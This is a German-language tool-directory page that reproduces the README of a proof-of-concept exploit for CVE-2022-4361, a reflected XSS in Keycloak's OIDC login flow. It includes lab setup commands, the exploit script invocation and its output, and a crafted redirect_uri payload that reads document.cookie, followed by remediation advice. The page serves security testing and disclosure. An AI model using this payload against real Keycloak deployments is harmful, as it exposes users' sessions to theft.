Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-4361 — Proof-of-concept-Exploit für CVE-2022-4361, eine reflektierte XSS-Schwachstelle im OIDC-Authentifizierungsablauf von Keycloak, mit Docker-basierter Testumgebung und Python-Exploit-Skript. | Kitploit
Tools/GitHubGitHub/faccimatteo/cve-2022-4361
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungAPI-Sicherheit
GitHubfaccimatteo/cve-2022-4361

CVE-2022-4361

Proof-of-concept-Exploit für CVE-2022-4361, eine reflektierte XSS-Schwachstelle im OIDC-Authentifizierungsablauf von Keycloak, mit Docker-basierter Testumgebung und Python-Exploit-Skript.

Repository anzeigen
3vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-4361

Beschreibung

Dieses Repository enthält einen PoC für CVE-2022-4361.
Alle Credits gehen an den ursprünglichen Autor der Entdeckung, mulliken.

WICHTIG: Dieser PoC ist nicht vollständig, da er den Fall des AssertionConsumerServiceURL-Werts im SAML-Authentifizierungsprotokoll nicht abdeckt. Derzeit ist nur der OIDC-Fall abgedeckt.

Schritte

  1. Klone dieses Repository.
root@kitploit:~
git clone https://github.com/faccimatteo/CVE-2022-4361.git && cd ./CVE-2022-4361 
  1. Richte eine verwundbare Keycloak-Version mit Docker Compose ein.
root@kitploit:~
docker compose up -d

Warte, bis die Infrastruktur verfügbar und erreichbar ist.

Da Keycloak in diesem PoC nicht in eine Webanwendung integriert ist, muss die vollständige Keycloak-Authentifizierungs-URL angegeben werden (sobald die Test-Realm korrekt eingerichtet wurde).

Die Sicherheitslücke in dieser Testumgebung kann mit der folgenden URL getestet werden.

root@kitploit:~
python3 ./CVE-2022-4361.py --url http://localhost:8080/realms/test-realm/protocol/openid-connect/auth\?client_id\=test-client\&redirect_uri\=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Ftest-realm%2Faccount%2F%23%2F\&state\=f0cd8010-72b1-476d-823a-b72e2106db1d\&response_mode\=fragment\&response_type\=code\&scope\=openid\&nonce\=eb117e13-b09e-49b1-a086-3ebb69d6ca3d\&code_challenge\=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w\&code_challenge_method\=S256
[+] Detected Keycloak OIDC configuration in the authentication flow for http://localhost:8080/realms/test-realm/protocol/openid-connect/auth?client_id=test-client&redirect_uri=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Ftest-realm%2Faccount%2F%23%2F&state=f0cd8010-72b1-476d-823a-b72e2106db1d&response_mode=fragment&response_type=code&scope=openid&nonce=eb117e13-b09e-49b1-a086-3ebb69d6ca3d&code_challenge=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w&code_challenge_method=S256.
[+] Crafted malicious Keycloak authentication URL: http://localhost:8080/realms/test-realm/protocol/openid-connect/auth?client_id=test-client&redirect_uri=javascript:confirm(document.cookie)&state=f0cd8010-72b1-476d-823a-b72e2106db1d&response_mode=form_post&response_type=code&scope=openid&nonce=eb117e13-b09e-49b1-a086-3ebb69d6ca3d&code_challenge=NhJQK3qf9T_85Rj0aYg2JbUm3Df23m1ZG3q1goqwU8w&code_challenge_method=S256
[+] The Keycloak instance used by the target is likely to be VULNERABLE to CVE-2022-4361!
[*] Opening malicious login page in your default web browser...

Ein Browserfenster mit der bösartigen Anmeldeseite wird geöffnet, wie im folgenden Screenshot zu sehen ist.

alt text

Sobald ein Opfer gültige Anmeldedaten (verfügbar in keycloak-config/test-realm.json) bereitstellt und auf den Sign In-Button klickt, wird der reflektierte XSS-Angriff ausgeliefert.
Es ist erwähnenswert, dass der Angriff selbst dann erfolgreich ist, wenn das Opfer bereits in der Anwendung angemeldet ist.

alt text

Behebung

  • Stelle sicher, dass du Keycloak auf eine Version > 21.1.1 aktualisierst.
  • Stelle außerdem sicher, dass du den Platzhalterwert * für redirect_uri in Produktionsumgebungen niemals setzt.

TODO

Derzeit deckt dieser PoC nur den Fall ab, dass Keycloak mit einem OIDC-Authentifizierungsablauf konfiguriert ist.
In den nächsten Bereitstellungen wird das SAML-Authentifizierungsprotokoll eingeführt.

Tool herunterladen